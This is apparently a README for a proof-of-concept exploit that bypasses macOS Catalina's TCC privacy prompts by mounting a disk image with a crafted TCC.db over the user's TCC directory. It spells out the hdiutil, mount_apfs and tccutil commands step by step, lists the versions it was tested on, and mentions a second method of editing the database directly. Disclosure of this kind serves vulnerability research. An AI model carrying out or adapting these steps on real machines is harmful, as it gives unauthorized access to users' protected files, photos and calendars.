An application can mount volumes at ~/Library/Application Support/com.apple.TCC
. This can be exploited by a malicious application to bypass TCC prompt by mounting a disk image containing TCC.db
at ~/Library/Application Support/com.apple.TCC
.
See file demo.mov
containing the video demonstrating this exploit. To run this exploit, execute following commands
-
Ensure
terminal
is not allowed to access~/Documents
directorytccutil reset All com.apple.Terminal ls ~/Documents # Press Don't allow when TCC prompt is displayed
The
ls
commands should fail withOperation not permitted error
-
Run
exploit.sh
to list files in~/Documents
directorybash exploit.sh
Running
exploit.sh
should output the list of files in~/Documents
directory
Malicious applications can bypass TCC prompt and access sensitive data like Contacts
, Photos
, ~/Documents
etc. normally protected by system.
This exploit is tested to work on
-
Latest macOS Catalina stable release
10.15.3 (19D76)
-
Latest macOS Catalina developer beta
10.15.4 Beta 3 (19E242d)
Note: In macOS Catalina stable release 10.15.3 (19D76)
, an application can directly read and write ~/Library/Application Support/com.apple.TCC/TCC.db
. Hence a malicious application can bypass TCC by directly modifying database TCC.db
. This is fixed on current macOS catalina developer beta version. But mounting volumes at ~/Library/Application Support/com.apple.TCC
still works in developer beta which is utilized by this exploit.
The com.apple.TCC.dmg
disk image contains TCC.db
which authorise following services for Terminal
app
-
kTCCServiceSystemPolicyDownloadsFolder
-
kTCCServiceSystemPolicyDocumentsFolder
-
kTCCServicePhotos
-
kTCCServiceSystemPolicyDesktopFolder
-
kTCCServiceCalendar
The following commands will mount the disk image com.apple.TCC.dmg
at ~/Library/Application Support/com.apple.TCC
. This will override the TCC.db
database with TCC.db
in disk image
-
Attach the APFS disk image using
hdiutil
hdiutil attach -nomount com.apple.TCC.dmg
This should output will be similar to
/dev/disk2 GUID_partition_scheme /dev/disk2s1 Apple_APFS /dev/disk3 EF57347C-0000-11AA-AA11-0030654 /dev/disk3s1 41504653-0000-11AA-AA11-0030654
Note: In above example output, the partition in disk image where
TCC.db
is stored is attached to/dev/disk3s1
. Replace/dev/disk3s1
in below steps if you have a different output. -
Mount the disk partition to
~/Library/Application Support/com.apple.TCC
mount_apfs /dev/disk3s1 ~/Library/Application\ Support/com.apple.TCC
-
Use
tccutil
to reload databaseTCC.db
. This will load the database inside mounted volumetccutil reset AddressBook com.apple.Terminal
-
Access restricted
~/Documents
directoryls ~/Documents
-
Optional: Cleanup by unmounting and reloading
TCC.db
hdiutil detach -force /dev/disk3 tccutil reset AddressBook com.apple.Terminal
- Initial release
- It is possible to mount volumes at non empty directories without
union
mount option. Thusunion
mount option is not required for this exploit to work. Updated title and sections "summary" and "working" to reflect this change - Tested and verified that this exploit works on latest macOS catalina beta release
10.15.4 Beta 3 (19E242d)
. Updated "exploitability" section to reflect this change - Added note in "exploitability" section mentioning another exploit method which works on current macOS catalina stable release
10.15.3 (19D76)
but is fixed on latest developer beta